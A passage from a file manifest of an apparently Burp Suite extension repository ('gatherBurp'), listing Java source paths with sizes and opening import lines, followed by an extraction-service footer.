"preview": "package burp.ui;\n\nimport burp.*;\nimport burp.bean.SimilarDomainResultBean;\nimport burp.bean.SimilarProjectBean;\nimport b"
},
{
"path": "src/main/java/burp/ui/SocksUI.java",
"chars": 13025,
"preview": "package burp.ui;\n\nimport burp.IBurpExtenderCallbacks;\nimport burp.ui.UIHepler.GridBagConstraintsHelper;\nimport burp.util"
},
{
"path": "src/main/java/burp/ui/SqlUI.java",
"chars": 81084,
"preview": "package burp.ui;\n\nimport burp.*;\nimport burp.bean.SqlBean;\nimport burp.ui.UIHepler.GridBagConstraintsHelper;\nimport burp"
},
{
"path": "src/main/java/burp/ui/UIHandler.java",
"chars": 208,
"preview": "package burp.ui;\n\nimport burp.IBurpExtenderCallbacks;\n\nimport javax.swing.*;\n\npublic interface UIHandler {\n void init"
},
{
"path": "src/main/java/burp/ui/UIHepler/GridBagConstraintsHelper.java",
"chars": 2582,
"preview": "package burp.ui.UIHepler;\n\nimport java.awt.*;\n\n/**\n * @Author Xm17\n * @Date 2024-06-14 10:50\n */\npublic class GridBagCon"
},
{
"path": "src/main/java/burp/ui/UrlRedirectUI.java",
"chars": 19276,
"preview": "package burp.ui;\n\nimport burp.*;\nimport burp.utils.I18nUtils;\nimport burp.utils.Utils;\n\nimport javax.swing.*;\nimport jav"
},
{
"path": "src/main/java/burp/utils/CustomScanIssue.java",
"chars": 1765,
"preview": "package burp.utils;\n\nimport burp.IHttpRequestResponse;\nimport burp.IHttpService;\nimport burp.IScanIssue;\n\nimport java.ne"
},
{
"path": "src/main/java/burp/utils/DbUtils.java",
"chars": 27170,
"preview": "package burp.utils;\n\nimport java.nio.file.Files;\nimport java.nio.file.Path;\nimport java.nio.file.Paths;\nimport java.sql."
},
{
"path": "src/main/java/burp/utils/ExpressionUtils.java",
"chars": 8480,
"preview": "package burp.utils;\n\nimport burp.IHttpRequestResponse;\nimport burp.IRequestInfo;\nimport burp.IResponseInfo;\n\nimport java"
},
{
"path": "src/main/java/burp/utils/I18nUtils.java",
"chars": 23586,
"preview": "package burp.utils;\n\nimport burp.bean.ConfigBean;\nimport burp.dao.ConfigDao;\n\nimport java.util.HashMap;\nimport java.util"
},
{
"path": "src/main/java/burp/utils/JsonProcessorUtil.java",
"chars": 15188,
"preview": "package burp.utils;\n\nimport com.alibaba.fastjson.JSON;\nimport com.alibaba.fastjson.JSONArray;\nimport com.alibaba.fastjso"
},
{
"path": "src/main/java/burp/utils/JsonUtils.java",
"chars": 8310,
"preview": "package burp.utils;\n\nimport java.util.*;\nimport java.util.regex.Matcher;\nimport java.util.regex.Pattern;\n\npublic class J"
},
{
"path": "src/main/java/burp/utils/Nuclei.java",
"chars": 4312,
"preview": "package burp.utils;\n\nimport burp.IHttpRequestResponse;\nimport burp.IRequestInfo;\nimport burp.bean.NucleiBean;\nimport org"
},
{
"path": "src/main/java/burp/utils/ResponseSimilarityMatcher.java",
"chars": 3592,
"preview": "package burp.utils;\n\nimport java.util.*;\n\npublic class ResponseSimilarityMatcher {\n // 相似度阈值,可以根据实际测试调整\n private s"
},
{
"path": "src/main/java/burp/utils/RobotInput.java",
"chars": 763,
"preview": "package burp.utils;\n\nimport javax.swing.*;\nimport java.awt.*;\nimport java.awt.datatransfer.Clipboard;\nimport java.awt.da"
},
{
"path": "src/main/java/burp/utils/SmartRequestDetector.java",
"chars": 6355,
"preview": "package burp.utils;\n\nimport burp.IExtensionHelpers;\nimport burp.IHttpRequestResponse;\nimport burp.IHttpService;\nimport b"
},
{
"path": "src/main/java/burp/utils/UrlCacheUtil.java",
"chars": 3703,
"preview": "package burp.utils;\n\nimport burp.IParameter;\n\nimport javax.rmi.CORBA.Util;\nimport java.net.URL;\nimport java.util.*;\nimpo"
},
{
"path": "src/main/java/burp/utils/Utils.java",
"chars": 12768,
"preview": "package burp.utils;\n\nimport burp.IBurpExtenderCallbacks;\nimport burp.IExtensionHelpers;\nimport burp.IHttpRequestResponse"
},
{
"path": "src/main/resources/logback.xml",
"chars": 168,
"preview": "<configuration>\n <!-- other configurations -->\n\n <logger name=\"org.xm.similarity.text\" level=\"INFO\"/>\n\n <!-- ot"
}
]
About this extraction
This page contains the full source code of the kN6jq/gatherBurp GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 78 files (543.5 KB), approximately 132.5k tokens, and a symbol index with 789 extracted functions, classes, methods, constants, and types. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.